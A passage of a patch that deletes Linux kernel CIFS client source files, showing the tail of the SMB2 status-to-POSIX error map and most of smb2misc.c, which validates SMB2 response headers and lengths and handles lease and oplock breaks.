+-	"STATUS_IPSEC_REPLAY_CHECK_FAILED"},
+-	{STATUS_IPSEC_INVALID_PACKET, -EIO, "STATUS_IPSEC_INVALID_PACKET"},
+-	{STATUS_IPSEC_INTEGRITY_CHECK_FAILED, -EIO,
+-	"STATUS_IPSEC_INTEGRITY_CHECK_FAILED"},
+-	{STATUS_IPSEC_CLEAR_TEXT_DROP, -EIO, "STATUS_IPSEC_CLEAR_TEXT_DROP"},
+-	{0, 0, NULL}
+-};
+-
+-/*****************************************************************************
+- Print an error message from the status code
+- *****************************************************************************/
+-static void
+-smb2_print_status(__le32 status)
+-{
+-	int idx = 0;
+-
+-	while (smb2_error_map_table[idx].status_string != NULL) {
+-		if ((smb2_error_map_table[idx].smb2_status) == status) {
+-			pr_notice("Status code returned 0x%08x %s\n", status,
+-				  smb2_error_map_table[idx].status_string);
+-		}
+-		idx++;
+-	}
+-	return;
+-}
+-
+-int
+-map_smb2_to_linux_error(char *buf, bool log_err)
+-{
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-	unsigned int i;
+-	int rc = -EIO;
+-	__le32 smb2err = shdr->Status;
+-
+-	if (smb2err == 0) {
+-		trace_smb3_cmd_done(le32_to_cpu(shdr->Id.SyncId.TreeId),
+-			      le64_to_cpu(shdr->SessionId),
+-			      le16_to_cpu(shdr->Command),
+-			      le64_to_cpu(shdr->MessageId));
+-		return 0;
+-	}
+-
+-	/* mask facility */
+-	if (log_err && (smb2err != STATUS_MORE_PROCESSING_REQUIRED) &&
+-	    (smb2err != STATUS_END_OF_FILE))
+-		smb2_print_status(smb2err);
+-	else if (cifsFYI & CIFS_RC)
+-		smb2_print_status(smb2err);
+-
+-	for (i = 0; i < sizeof(smb2_error_map_table) /
+-			sizeof(struct status_to_posix_error); i++) {
+-		if (smb2_error_map_table[i].smb2_status == smb2err) {
+-			rc = smb2_error_map_table[i].posix_error;
+-			break;
+-		}
+-	}
+-
+-	/* on error mapping not found  - return EIO */
+-
+-	cifs_dbg(FYI, "Mapping SMB2 status code 0x%08x to POSIX err %d\n",
+-		 __le32_to_cpu(smb2err), rc);
+-
+-	trace_smb3_cmd_err(le32_to_cpu(shdr->Id.SyncId.TreeId),
+-			   le64_to_cpu(shdr->SessionId),
+-			   le16_to_cpu(shdr->Command),
+-			   le64_to_cpu(shdr->MessageId),
+-			   le32_to_cpu(smb2err), rc);
+-	return rc;
+-}
+diff --git a/fs/cifs/smb2misc.c b/fs/cifs/smb2misc.c
+deleted file mode 100644
+index 572293c18e16f..0000000000000
+--- a/fs/cifs/smb2misc.c
++++ /dev/null
+@@ -1,944 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2011
+- *                 Etersoft, 2012
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *              Pavel Shilovsky (pshilovsky@samba.org) 2012
+- *
+- */
+-#include <linux/ctype.h>
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "smb2proto.h"
+-#include "cifs_debug.h"
+-#include "cifs_unicode.h"
+-#include "smb2status.h"
+-#include "smb2glob.h"
+-#include "nterr.h"
+-#include "cached_dir.h"
+-
+-static int
+-check_smb2_hdr(struct smb2_hdr *shdr, __u64 mid)
+-{
+-	__u64 wire_mid = le64_to_cpu(shdr->MessageId);
+-
+-	/*
+-	 * Make sure that this really is an SMB, that it is a response,
+-	 * and that the message ids match.
+-	 */
+-	if ((shdr->ProtocolId == SMB2_PROTO_NUMBER) &&
+-	    (mid == wire_mid)) {
+-		if (shdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR)
+-			return 0;
+-		else {
+-			/* only one valid case where server sends us request */
+-			if (shdr->Command == SMB2_OPLOCK_BREAK)
+-				return 0;
+-			else
+-				cifs_dbg(VFS, "Received Request not response\n");
+-		}
+-	} else { /* bad signature or mid */
+-		if (shdr->ProtocolId != SMB2_PROTO_NUMBER)
+-			cifs_dbg(VFS, "Bad protocol string signature header %x\n",
+-				 le32_to_cpu(shdr->ProtocolId));
+-		if (mid != wire_mid)
+-			cifs_dbg(VFS, "Mids do not match: %llu and %llu\n",
+-				 mid, wire_mid);
+-	}
+-	cifs_dbg(VFS, "Bad SMB detected. The Mid=%llu\n", wire_mid);
+-	return 1;
+-}
+-
+-/*
+- *  The following table defines the expected "StructureSize" of SMB2 responses
+- *  in order by SMB2 command.  This is similar to "wct" in SMB/CIFS responses.
+- *
+- *  Note that commands are defined in smb2pdu.h in le16 but the array below is
+- *  indexed by command in host byte order
+- */
+-static const __le16 smb2_rsp_struct_sizes[NUMBER_OF_SMB2_COMMANDS] = {
+-	/* SMB2_NEGOTIATE */ cpu_to_le16(65),
+-	/* SMB2_SESSION_SETUP */ cpu_to_le16(9),
+-	/* SMB2_LOGOFF */ cpu_to_le16(4),
+-	/* SMB2_TREE_CONNECT */ cpu_to_le16(16),
+-	/* SMB2_TREE_DISCONNECT */ cpu_to_le16(4),
+-	/* SMB2_CREATE */ cpu_to_le16(89),
+-	/* SMB2_CLOSE */ cpu_to_le16(60),
+-	/* SMB2_FLUSH */ cpu_to_le16(4),
+-	/* SMB2_READ */ cpu_to_le16(17),
+-	/* SMB2_WRITE */ cpu_to_le16(17),
+-	/* SMB2_LOCK */ cpu_to_le16(4),
+-	/* SMB2_IOCTL */ cpu_to_le16(49),
+-	/* BB CHECK this ... not listed in documentation */
+-	/* SMB2_CANCEL */ cpu_to_le16(0),
+-	/* SMB2_ECHO */ cpu_to_le16(4),
+-	/* SMB2_QUERY_DIRECTORY */ cpu_to_le16(9),
+-	/* SMB2_CHANGE_NOTIFY */ cpu_to_le16(9),
+-	/* SMB2_QUERY_INFO */ cpu_to_le16(9),
+-	/* SMB2_SET_INFO */ cpu_to_le16(2),
+-	/* BB FIXME can also be 44 for lease break */
+-	/* SMB2_OPLOCK_BREAK */ cpu_to_le16(24)
+-};
+-
+-#define SMB311_NEGPROT_BASE_SIZE (sizeof(struct smb2_hdr) + sizeof(struct smb2_negotiate_rsp))
+-
+-static __u32 get_neg_ctxt_len(struct smb2_hdr *hdr, __u32 len,
+-			      __u32 non_ctxlen)
+-{
+-	__u16 neg_count;
+-	__u32 nc_offset, size_of_pad_before_neg_ctxts;
+-	struct smb2_negotiate_rsp *pneg_rsp = (struct smb2_negotiate_rsp *)hdr;
+-
+-	/* Negotiate contexts are only valid for latest dialect SMB3.11 */
+-	neg_count = le16_to_cpu(pneg_rsp->NegotiateContextCount);
+-	if ((neg_count == 0) ||
+-	   (pneg_rsp->DialectRevision != cpu_to_le16(SMB311_PROT_ID)))
+-		return 0;
+-
+-	/*
+-	 * if SPNEGO blob present (ie the RFC2478 GSS info which indicates
+-	 * which security mechanisms the server supports) make sure that
+-	 * the negotiate contexts start after it
+-	 */
+-	nc_offset = le32_to_cpu(pneg_rsp->NegotiateContextOffset);
+-	/*
+-	 * non_ctxlen is at least shdr->StructureSize + pdu->StructureSize2
+-	 * and the latter is 1 byte bigger than the fix-sized area of the
+-	 * NEGOTIATE response
+-	 */
+-	if (nc_offset + 1 < non_ctxlen) {
+-		pr_warn_once("Invalid negotiate context offset %d\n", nc_offset);
+-		return 0;
+-	} else if (nc_offset + 1 == non_ctxlen) {
+-		cifs_dbg(FYI, "no SPNEGO security blob in negprot rsp\n");
+-		size_of_pad_before_neg_ctxts = 0;
+-	} else if (non_ctxlen == SMB311_NEGPROT_BASE_SIZE)
+-		/* has padding, but no SPNEGO blob */
+-		size_of_pad_before_neg_ctxts = nc_offset - non_ctxlen + 1;
+-	else
+-		size_of_pad_before_neg_ctxts = nc_offset - non_ctxlen;
+-
+-	/* Verify that at least minimal negotiate contexts fit within frame */
+-	if (len < nc_offset + (neg_count * sizeof(struct smb2_neg_context))) {
+-		pr_warn_once("negotiate context goes beyond end\n");
+-		return 0;
+-	}
+-
+-	cifs_dbg(FYI, "length of negcontexts %d pad %d\n",
+-		len - nc_offset, size_of_pad_before_neg_ctxts);
+-
+-	/* length of negcontexts including pad from end of sec blob to them */
+-	return (len - nc_offset) + size_of_pad_before_neg_ctxts;
+-}
+-
+-int
+-smb2_check_message(char *buf, unsigned int len, struct TCP_Server_Info *server)
+-{
+-	struct TCP_Server_Info *pserver;
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-	struct smb2_pdu *pdu = (struct smb2_pdu *)shdr;
+-	int hdr_size = sizeof(struct smb2_hdr);
+-	int pdu_size = sizeof(struct smb2_pdu);
+-	int command;
+-	__u32 calc_len; /* calculated length */
+-	__u64 mid;
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	/*
+-	 * Add function to do table lookup of StructureSize by command
+-	 * ie Validate the wct via smb2_struct_sizes table above
+-	 */
+-	if (shdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM) {
+-		struct smb2_transform_hdr *thdr =
+-			(struct smb2_transform_hdr *)buf;
+-		struct cifs_ses *ses = NULL;
+-		struct cifs_ses *iter;
+-
+-		/* decrypt frame now that it is completely read in */
+-		spin_lock(&cifs_tcp_ses_lock);
+-		list_for_each_entry(iter, &pserver->smb_ses_list, smb_ses_list) {
+-			if (iter->Suid == le64_to_cpu(thdr->SessionId)) {
+-				ses = iter;
+-				break;
+-			}
+-		}
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		if (!ses) {
+-			cifs_dbg(VFS, "no decryption - session id not found\n");
+-			return 1;
+-		}
+-	}
+-
+-	mid = le64_to_cpu(shdr->MessageId);
+-	if (len < pdu_size) {
+-		if ((len >= hdr_size)
+-		    && (shdr->Status != 0)) {
+-			pdu->StructureSize2 = 0;
+-			/*
+-			 * As with SMB/CIFS, on some error cases servers may
+-			 * not return wct properly
+-			 */
+-			return 0;
+-		} else {
+-			cifs_dbg(VFS, "Length less than SMB header size\n");
+-		}
+-		return 1;
+-	}
+-	if (len > CIFSMaxBufSize + MAX_SMB2_HDR_SIZE) {
+-		cifs_dbg(VFS, "SMB length greater than maximum, mid=%llu\n",
+-			 mid);
+-		return 1;
+-	}
+-
+-	if (check_smb2_hdr(shdr, mid))
+-		return 1;
+-
+-	if (shdr->StructureSize != SMB2_HEADER_STRUCTURE_SIZE) {
+-		cifs_dbg(VFS, "Invalid structure size %u\n",
+-			 le16_to_cpu(shdr->StructureSize));
+-		return 1;
+-	}
+-
+-	command = le16_to_cpu(shdr->Command);
+-	if (command >= NUMBER_OF_SMB2_COMMANDS) {
+-		cifs_dbg(VFS, "Invalid SMB2 command %d\n", command);
+-		return 1;
+-	}
+-
+-	if (smb2_rsp_struct_sizes[command] != pdu->StructureSize2) {
+-		if (command != SMB2_OPLOCK_BREAK_HE && (shdr->Status == 0 ||
+-		    pdu->StructureSize2 != SMB2_ERROR_STRUCTURE_SIZE2_LE)) {
+-			/* error packets have 9 byte structure size */
+-			cifs_dbg(VFS, "Invalid response size %u for command %d\n",
+-				 le16_to_cpu(pdu->StructureSize2), command);
+-			return 1;
+-		} else if (command == SMB2_OPLOCK_BREAK_HE
+-			   && (shdr->Status == 0)
+-			   && (le16_to_cpu(pdu->StructureSize2) != 44)
+-			   && (le16_to_cpu(pdu->StructureSize2) != 36)) {
+-			/* special case for SMB2.1 lease break message */
+-			cifs_dbg(VFS, "Invalid response size %d for oplock break\n",
+-				 le16_to_cpu(pdu->StructureSize2));
+-			return 1;
+-		}
+-	}
+-
+-	calc_len = smb2_calc_size(buf);
+-
+-	/* For SMB2_IOCTL, OutputOffset and OutputLength are optional, so might
+-	 * be 0, and not a real miscalculation */
+-	if (command == SMB2_IOCTL_HE && calc_len == 0)
+-		return 0;
+-
+-	if (command == SMB2_NEGOTIATE_HE)
+-		calc_len += get_neg_ctxt_len(shdr, len, calc_len);
+-
+-	if (len != calc_len) {
+-		/* create failed on symlink */
+-		if (command == SMB2_CREATE_HE &&
+-		    shdr->Status == STATUS_STOPPED_ON_SYMLINK)
+-			return 0;
+-		/* Windows 7 server returns 24 bytes more */
+-		if (calc_len + 24 == len && command == SMB2_OPLOCK_BREAK_HE)
+-			return 0;
+-		/* server can return one byte more due to implied bcc[0] */
+-		if (calc_len == len + 1)
+-			return 0;
+-
+-		/*
+-		 * Some windows servers (win2016) will pad also the final
+-		 * PDU in a compound to 8 bytes.
+-		 */
+-		if (ALIGN(calc_len, 8) == len)
+-			return 0;
+-
+-		/*
+-		 * MacOS server pads after SMB2.1 write response with 3 bytes
+-		 * of junk. Other servers match RFC1001 len to actual
+-		 * SMB2/SMB3 frame length (header + smb2 response specific data)
+-		 * Some windows servers also pad up to 8 bytes when compounding.
+-		 */
+-		if (calc_len < len)
+-			return 0;
+-
+-		/* Only log a message if len was really miscalculated */
+-		if (unlikely(cifsFYI))
+-			cifs_dbg(FYI, "Server response too short: calculated "
+-				 "length %u doesn't match read length %u (cmd=%d, mid=%llu)\n",
+-				 calc_len, len, command, mid);
+-		else
+-			pr_warn("Server response too short: calculated length "
+-				"%u doesn't match read length %u (cmd=%d, mid=%llu)\n",
+-				calc_len, len, command, mid);
+-
+-		return 1;
+-	}
+-	return 0;
+-}
+-
+-/*
+- * The size of the variable area depends on the offset and length fields
+- * located in different fields for various SMB2 responses. SMB2 responses
+- * with no variable length info, show an offset of zero for the offset field.
+- */
+-static const bool has_smb2_data_area[NUMBER_OF_SMB2_COMMANDS] = {
+-	/* SMB2_NEGOTIATE */ true,
+-	/* SMB2_SESSION_SETUP */ true,
+-	/* SMB2_LOGOFF */ false,
+-	/* SMB2_TREE_CONNECT */	false,
+-	/* SMB2_TREE_DISCONNECT */ false,
+-	/* SMB2_CREATE */ true,
+-	/* SMB2_CLOSE */ false,
+-	/* SMB2_FLUSH */ false,
+-	/* SMB2_READ */	true,
+-	/* SMB2_WRITE */ false,
+-	/* SMB2_LOCK */	false,
+-	/* SMB2_IOCTL */ true,
+-	/* SMB2_CANCEL */ false, /* BB CHECK this not listed in documentation */
+-	/* SMB2_ECHO */ false,
+-	/* SMB2_QUERY_DIRECTORY */ true,
+-	/* SMB2_CHANGE_NOTIFY */ true,
+-	/* SMB2_QUERY_INFO */ true,
+-	/* SMB2_SET_INFO */ false,
+-	/* SMB2_OPLOCK_BREAK */ false
+-};
+-
+-/*
+- * Returns the pointer to the beginning of the data area. Length of the data
+- * area and the offset to it (from the beginning of the smb are also returned.
+- */
+-char *
+-smb2_get_data_area_len(int *off, int *len, struct smb2_hdr *shdr)
+-{
+-	*off = 0;
+-	*len = 0;
+-
+-	/* error responses do not have data area */
+-	if (shdr->Status && shdr->Status != STATUS_MORE_PROCESSING_REQUIRED &&
+-	    (((struct smb2_err_rsp *)shdr)->StructureSize) ==
+-						SMB2_ERROR_STRUCTURE_SIZE2_LE)
+-		return NULL;
+-
+-	/*
+-	 * Following commands have data areas so we have to get the location
+-	 * of the data buffer offset and data buffer length for the particular
+-	 * command.
+-	 */
+-	switch (shdr->Command) {
+-	case SMB2_NEGOTIATE:
+-		*off = le16_to_cpu(
+-		  ((struct smb2_negotiate_rsp *)shdr)->SecurityBufferOffset);
+-		*len = le16_to_cpu(
+-		  ((struct smb2_negotiate_rsp *)shdr)->SecurityBufferLength);
+-		break;
+-	case SMB2_SESSION_SETUP:
+-		*off = le16_to_cpu(
+-		  ((struct smb2_sess_setup_rsp *)shdr)->SecurityBufferOffset);
+-		*len = le16_to_cpu(
+-		  ((struct smb2_sess_setup_rsp *)shdr)->SecurityBufferLength);
+-		break;
+-	case SMB2_CREATE:
+-		*off = le32_to_cpu(
+-		    ((struct smb2_create_rsp *)shdr)->CreateContextsOffset);
+-		*len = le32_to_cpu(
+-		    ((struct smb2_create_rsp *)shdr)->CreateContextsLength);
+-		break;
+-	case SMB2_QUERY_INFO:
+-		*off = le16_to_cpu(
+-		    ((struct smb2_query_info_rsp *)shdr)->OutputBufferOffset);
+-		*len = le32_to_cpu(
+-		    ((struct smb2_query_info_rsp *)shdr)->OutputBufferLength);
+-		break;
+-	case SMB2_READ:
+-		/* TODO: is this a bug ? */
+-		*off = ((struct smb2_read_rsp *)shdr)->DataOffset;
+-		*len = le32_to_cpu(((struct smb2_read_rsp *)shdr)->DataLength);
+-		break;
+-	case SMB2_QUERY_DIRECTORY:
+-		*off = le16_to_cpu(
+-		  ((struct smb2_query_directory_rsp *)shdr)->OutputBufferOffset);
+-		*len = le32_to_cpu(
+-		  ((struct smb2_query_directory_rsp *)shdr)->OutputBufferLength);
+-		break;
+-	case SMB2_IOCTL:
+-		*off = le32_to_cpu(
+-		  ((struct smb2_ioctl_rsp *)shdr)->OutputOffset);
+-		*len = le32_to_cpu(
+-		  ((struct smb2_ioctl_rsp *)shdr)->OutputCount);
+-		break;
+-	case SMB2_CHANGE_NOTIFY:
+-		*off = le16_to_cpu(
+-		  ((struct smb2_change_notify_rsp *)shdr)->OutputBufferOffset);
+-		*len = le32_to_cpu(
+-		  ((struct smb2_change_notify_rsp *)shdr)->OutputBufferLength);
+-		break;
+-	default:
+-		cifs_dbg(VFS, "no length check for command %d\n", le16_to_cpu(shdr->Command));
+-		break;
+-	}
+-
+-	/*
+-	 * Invalid length or offset probably means data area is invalid, but
+-	 * we have little choice but to ignore the data area in this case.
+-	 */
+-	if (*off > 4096) {
+-		cifs_dbg(VFS, "offset %d too large, data area ignored\n", *off);
+-		*len = 0;
+-		*off = 0;
+-	} else if (*off < 0) {
+-		cifs_dbg(VFS, "negative offset %d to data invalid ignore data area\n",
+-			 *off);
+-		*off = 0;
+-		*len = 0;
+-	} else if (*len < 0) {
+-		cifs_dbg(VFS, "negative data length %d invalid, data area ignored\n",
+-			 *len);
+-		*len = 0;
+-	} else if (*len > 128 * 1024) {
+-		cifs_dbg(VFS, "data area larger than 128K: %d\n", *len);
+-		*len = 0;
+-	}
+-
+-	/* return pointer to beginning of data area, ie offset from SMB start */
+-	if ((*off != 0) && (*len != 0))
+-		return (char *)shdr + *off;
+-	else
+-		return NULL;
+-}
+-
+-/*
+- * Calculate the size of the SMB message based on the fixed header
+- * portion, the number of word parameters and the data portion of the message.
+- */
+-unsigned int
+-smb2_calc_size(void *buf)
+-{
+-	struct smb2_pdu *pdu = buf;
+-	struct smb2_hdr *shdr = &pdu->hdr;
+-	int offset; /* the offset from the beginning of SMB to data area */
+-	int data_length; /* the length of the variable length data area */
+-	/* Structure Size has already been checked to make sure it is 64 */
+-	int len = le16_to_cpu(shdr->StructureSize);
+-
+-	/*
+-	 * StructureSize2, ie length of fixed parameter area has already
+-	 * been checked to make sure it is the correct length.
+-	 */
+-	len += le16_to_cpu(pdu->StructureSize2);
+-
+-	if (has_smb2_data_area[le16_to_cpu(shdr->Command)] == false)
+-		goto calc_size_exit;
+-
+-	smb2_get_data_area_len(&offset, &data_length, shdr);
+-	cifs_dbg(FYI, "SMB2 data length %d offset %d\n", data_length, offset);
+-
+-	if (data_length > 0) {
+-		/*
+-		 * Check to make sure that data area begins after fixed area,
+-		 * Note that last byte of the fixed area is part of data area
+-		 * for some commands, typically those with odd StructureSize,
+-		 * so we must add one to the calculation.
+-		 */
+-		if (offset + 1 < len) {
+-			cifs_dbg(VFS, "data area offset %d overlaps SMB2 header %d\n",
+-				 offset + 1, len);
+-			data_length = 0;
+-		} else {
+-			len = offset + data_length;
+-		}
+-	}
+-calc_size_exit:
+-	cifs_dbg(FYI, "SMB2 len %d\n", len);
+-	return len;
+-}
+-
+-/* Note: caller must free return buffer */
+-__le16 *
+-cifs_convert_path_to_utf16(const char *from, struct cifs_sb_info *cifs_sb)
+-{
+-	int len;
+-	const char *start_of_path;
+-	__le16 *to;
+-	int map_type;
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SFM_CHR)
+-		map_type = SFM_MAP_UNI_RSVD;
+-	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR)
+-		map_type = SFU_MAP_UNI_RSVD;
+-	else
+-		map_type = NO_MAP_UNI_RSVD;
+-
+-	/* Windows doesn't allow paths beginning with \ */
+-	if (from[0] == '\\')
+-		start_of_path = from + 1;
+-
+-	/* SMB311 POSIX extensions paths do not include leading slash */
+-	else if (cifs_sb_master_tlink(cifs_sb) &&
+-		 cifs_sb_master_tcon(cifs_sb)->posix_extensions &&
+-		 (from[0] == '/')) {
+-		start_of_path = from + 1;
+-	} else
+-		start_of_path = from;
+-
+-	to = cifs_strndup_to_utf16(start_of_path, PATH_MAX, &len,
+-				   cifs_sb->local_nls, map_type);
+-	return to;
+-}
+-
+-__le32
+-smb2_get_lease_state(struct cifsInodeInfo *cinode)
+-{
+-	__le32 lease = 0;
+-
+-	if (CIFS_CACHE_WRITE(cinode))
+-		lease |= SMB2_LEASE_WRITE_CACHING_LE;
+-	if (CIFS_CACHE_HANDLE(cinode))
+-		lease |= SMB2_LEASE_HANDLE_CACHING_LE;
+-	if (CIFS_CACHE_READ(cinode))
+-		lease |= SMB2_LEASE_READ_CACHING_LE;
+-	return lease;
+-}
+-
+-struct smb2_lease_break_work {
+-	struct work_struct lease_break;
+-	struct tcon_link *tlink;
+-	__u8 lease_key[16];
+-	__le32 lease_state;
+-};
+-
+-static void
+-cifs_ses_oplock_break(struct work_struct *work)
+-{
+-	struct smb2_lease_break_work *lw = container_of(work,
+-				struct smb2_lease_break_work, lease_break);
+-	int rc = 0;
+-
+-	rc = SMB2_lease_break(0, tlink_tcon(lw->tlink), lw->lease_key,
+-			      lw->lease_state);
+-
+-	cifs_dbg(FYI, "Lease release rc %d\n", rc);
+-	cifs_put_tlink(lw->tlink);
+-	kfree(lw);
+-}
+-
+-static void
+-smb2_queue_pending_open_break(struct tcon_link *tlink, __u8 *lease_key,
+-			      __le32 new_lease_state)
+-{
+-	struct smb2_lease_break_work *lw;
+-
+-	lw = kmalloc(sizeof(struct smb2_lease_break_work), GFP_KERNEL);
+-	if (!lw) {
+-		cifs_put_tlink(tlink);
+-		return;
+-	}
+-
+-	INIT_WORK(&lw->lease_break, cifs_ses_oplock_break);
+-	lw->tlink = tlink;
+-	lw->lease_state = new_lease_state;
+-	memcpy(lw->lease_key, lease_key, SMB2_LEASE_KEY_SIZE);
+-	queue_work(cifsiod_wq, &lw->lease_break);
+-}
+-
+-static bool
+-smb2_tcon_has_lease(struct cifs_tcon *tcon, struct smb2_lease_break *rsp)
+-{
+-	__u8 lease_state;
+-	struct cifsFileInfo *cfile;
+-	struct cifsInodeInfo *cinode;
+-	int ack_req = le32_to_cpu(rsp->Flags &
+-				  SMB2_NOTIFY_BREAK_LEASE_FLAG_ACK_REQUIRED);
+-
+-	lease_state = le32_to_cpu(rsp->NewLeaseState);
+-
+-	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+-		cinode = CIFS_I(d_inode(cfile->dentry));
+-
+-		if (memcmp(cinode->lease_key, rsp->LeaseKey,
+-							SMB2_LEASE_KEY_SIZE))
+-			continue;
+-
+-		cifs_dbg(FYI, "found in the open list\n");
+-		cifs_dbg(FYI, "lease key match, lease break 0x%x\n",
+-			 lease_state);
+-
+-		if (ack_req)
+-			cfile->oplock_break_cancelled = false;
+-		else
+-			cfile->oplock_break_cancelled = true;
+-
+-		set_bit(CIFS_INODE_PENDING_OPLOCK_BREAK, &cinode->flags);
+-
+-		cfile->oplock_epoch = le16_to_cpu(rsp->Epoch);
+-		cfile->oplock_level = lease_state;
+-
+-		cifs_queue_oplock_break(cfile);
+-		return true;
+-	}
+-
+-	return false;
+-}
+-
+-static struct cifs_pending_open *
+-smb2_tcon_find_pending_open_lease(struct cifs_tcon *tcon,
+-				  struct smb2_lease_break *rsp)
+-{
+-	__u8 lease_state = le32_to_cpu(rsp->NewLeaseState);
+-	int ack_req = le32_to_cpu(rsp->Flags &
+-				  SMB2_NOTIFY_BREAK_LEASE_FLAG_ACK_REQUIRED);
+-	struct cifs_pending_open *open;
+-	struct cifs_pending_open *found = NULL;
+-
+-	list_for_each_entry(open, &tcon->pending_opens, olist) {
+-		if (memcmp(open->lease_key, rsp->LeaseKey,
+-			   SMB2_LEASE_KEY_SIZE))
+-			continue;
+-
+-		if (!found && ack_req) {
+-			found = open;
+-		}
+-
+-		cifs_dbg(FYI, "found in the pending open list\n");
+-		cifs_dbg(FYI, "lease key match, lease break 0x%x\n",
+-			 lease_state);
+-
+-		open->oplock = lease_state;
+-	}
+-
+-	return found;
+-}
+-
+-static bool
+-smb2_is_valid_lease_break(char *buffer, struct TCP_Server_Info *server)
+-{
+-	struct smb2_lease_break *rsp = (struct smb2_lease_break *)buffer;
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-	struct cifs_pending_open *open;
+-
+-	cifs_dbg(FYI, "Checking for lease break\n");
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	/* look up tcon based on tid & uid */
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-			spin_lock(&tcon->open_file_lock);
+-			cifs_stats_inc(
+-				       &tcon->stats.cifs_stats.num_oplock_brks);
+-			if (smb2_tcon_has_lease(tcon, rsp)) {
+-				spin_unlock(&tcon->open_file_lock);
+-				spin_unlock(&cifs_tcp_ses_lock);
+-				return true;
+-			}
+-			open = smb2_tcon_find_pending_open_lease(tcon,
+-								 rsp);
+-			if (open) {
+-				__u8 lease_key[SMB2_LEASE_KEY_SIZE];
+-				struct tcon_link *tlink;
+-
+-				tlink = cifs_get_tlink(open->tlink);
+-				memcpy(lease_key, open->lease_key,
+-				       SMB2_LEASE_KEY_SIZE);
+-				spin_unlock(&tcon->open_file_lock);
+-				spin_unlock(&cifs_tcp_ses_lock);
+-				smb2_queue_pending_open_break(tlink,
+-							      lease_key,
+-							      rsp->NewLeaseState);
+-				return true;
+-			}
+-			spin_unlock(&tcon->open_file_lock);
+-
+-			if (cached_dir_lease_break(tcon, rsp->LeaseKey)) {
+-				spin_unlock(&cifs_tcp_ses_lock);
+-				return true;
+-			}
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	cifs_dbg(FYI, "Can not process lease break - no lease matched\n");
+-	trace_smb3_lease_not_found(le32_to_cpu(rsp->CurrentLeaseState),
+-				   le32_to_cpu(rsp->hdr.Id.SyncId.TreeId),
+-				   le64_to_cpu(rsp->hdr.SessionId),
+-				   *((u64 *)rsp->LeaseKey),
+-				   *((u64 *)&rsp->LeaseKey[8]));
+-
+-	return false;
+-}
+-
+-bool
+-smb2_is_valid_oplock_break(char *buffer, struct TCP_Server_Info *server)
+-{
+-	struct smb2_oplock_break *rsp = (struct smb2_oplock_break *)buffer;
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-	struct cifsInodeInfo *cinode;
+-	struct cifsFileInfo *cfile;
+-
+-	cifs_dbg(FYI, "Checking for oplock break\n");
+-
+-	if (rsp->hdr.Command != SMB2_OPLOCK_BREAK)
+-		return false;
+-
+-	if (rsp->StructureSize !=
+-				smb2_rsp_struct_sizes[SMB2_OPLOCK_BREAK_HE]) {
+-		if (le16_to_cpu(rsp->StructureSize) == 44)
+-			return smb2_is_valid_lease_break(buffer, server);
+-		else
+-			return false;
+-	}
+-
+-	cifs_dbg(FYI, "oplock level 0x%x\n", rsp->OplockLevel);
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	/* look up tcon based on tid & uid */
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-
+-			spin_lock(&tcon->open_file_lock);
+-			list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+-				if (rsp->PersistentFid !=
+-				    cfile->fid.persistent_fid ||
+-				    rsp->VolatileFid !=
+-				    cfile->fid.volatile_fid)
+-					continue;
+-
+-				cifs_dbg(FYI, "file id match, oplock break\n");
+-				cifs_stats_inc(
+-				    &tcon->stats.cifs_stats.num_oplock_brks);
+-				cinode = CIFS_I(d_inode(cfile->dentry));
+-				spin_lock(&cfile->file_info_lock);
+-				if (!CIFS_CACHE_WRITE(cinode) &&
+-				    rsp->OplockLevel == SMB2_OPLOCK_LEVEL_NONE)
+-					cfile->oplock_break_cancelled = true;
+-				else
+-					cfile->oplock_break_cancelled = false;
+-
+-				set_bit(CIFS_INODE_PENDING_OPLOCK_BREAK,
+-					&cinode->flags);
+-
+-				cfile->oplock_epoch = 0;
+-				cfile->oplock_level = rsp->OplockLevel;
+-
+-				spin_unlock(&cfile->file_info_lock);
+-
+-				cifs_queue_oplock_break(cfile);
+-
+-				spin_unlock(&tcon->open_file_lock);
+-				spin_unlock(&cifs_tcp_ses_lock);
+-				return true;
+-			}
+-			spin_unlock(&tcon->open_file_lock);
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	cifs_dbg(FYI, "No file id matched, oplock break ignored\n");
+-	trace_smb3_oplock_not_found(0 /* no xid */, rsp->PersistentFid,
+-				  le32_to_cpu(rsp->hdr.Id.SyncId.TreeId),
+-				  le64_to_cpu(rsp->hdr.SessionId));
+-
+-	return true;
+-}
+-
+-void
+-smb2_cancelled_close_fid(struct work_struct *work)
+-{
+-	struct close_cancelled_open *cancelled = container_of(work,
+-					struct close_cancelled_open, work);
+-	struct cifs_tcon *tcon = cancelled->tcon;
+-	int rc;
+-
+-	if (cancelled->mid)
+-		cifs_tcon_dbg(VFS, "Close unmatched open for MID:%llu\n",
+-			      cancelled->mid);
+-	else
